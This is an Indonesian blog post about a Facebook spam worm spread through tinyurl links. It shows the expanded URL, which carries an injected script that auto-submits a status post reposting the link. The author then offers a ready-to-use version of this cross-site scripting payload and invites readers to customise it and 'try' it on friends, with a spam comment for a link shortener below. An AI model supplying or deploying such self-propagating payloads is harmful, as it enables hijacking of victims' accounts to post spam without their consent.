SPAM Facebook Dengan Penyingkat URL

Dua hari belakangan ini banyak teman Facebook yang terkena Spam. Statusnya tertulis pesan dari sebuah web yang menyebar secara otomatis setelah sang korban mengklik tautan yang telah disingkat, lihat gambar dibawah ini :

salah satu contoh yang diambil adalah tautan http://tinyurl.com/sampahh. Setelah dicoba menggunakan wget yang diterminal maka tautan tersebut berubah menjadi:

http://m.facebook.com/connect/prompt_feed.php?display=wapuser_message_prompt=’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E

jadi tautan dari tinyurl.com tadi adalah saranan untuk menyimpan java script untuk mengerjai facebook korban. 

Jika Anda ingin mencoba membuat jebakan betmen tersebut caranya cukup mudah sebetulnya dengan mengcopy link diberikut dan menambahkan kata-kata sesuai dengan yang Anda inginkan.

Contoh:
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload%3Dfunction(){document.forms[0].message.value%3D’nyoba iseng iseng berhadiah%3AD http%3A%2F%2Ftinyurl.com%2Fwakgonks’%3Bdocument.forms[0].submit()%3B}<%2Fscript>’

Untuk Link jadinya klik saja disini untuk mencoba

Silahkan diklik untuk mencoba jalan atau tidak link diatas. Dan supaya terasa SPAMnya ^_^

Silahkan dicoba tapi jangan keterlaluan ya kasian yang kena ^_^.

1 comment:

Blogger said...

Did you know that you can create short links with LinkShrink and earn money for every visitor to your shortened links.

Post a Comment

Related Posts Plugin for WordPress, Blogger...

Translate

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

 
Powered by Blogger